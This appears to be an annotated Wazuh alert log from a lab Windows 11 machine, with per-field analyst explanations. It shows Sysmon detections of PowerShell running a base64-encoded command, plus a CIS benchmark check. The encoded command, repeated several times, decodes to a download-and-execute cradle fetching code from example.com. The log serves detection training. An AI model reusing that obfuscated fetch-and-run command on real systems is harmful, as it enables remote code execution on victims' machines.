data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26042 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 2.3.10.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 38 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534226.1243086 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:44.5117007Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283086 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:43.206
ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00}
ProcessId: 13808
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00}
ParentProcessId: 9540
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:43.206 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfb-680a-f30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 42 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534226.1251153 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:44.7394845Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283087 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:44.700
ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00}
ProcessId: 13808
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zlhbjab1.ofo.ps1
CreationUtcTime: 2025-04-24 22:36:44.700
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:44.700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfb-680a-f30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zlhbjab1.ofo.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:44.700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 39 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1253922 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:48.9978915Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283194 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:46.080
ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00}
ProcessId: 12224
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00}
ParentProcessId: 13808
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:46.080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfe-680a-020b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 43 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1261993 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:49.2137491Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283195 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:49.197
ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00}
ProcessId: 12224
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_haclrpxn.hq3.ps1
CreationUtcTime: 2025-04-24 22:36:49.197
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:49.197 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcfe-680a-020b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_haclrpxn.hq3.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:49.197 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 40 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534228.1264762 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:51.5380699Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283230 Incremental log record number – handy for timeline order.
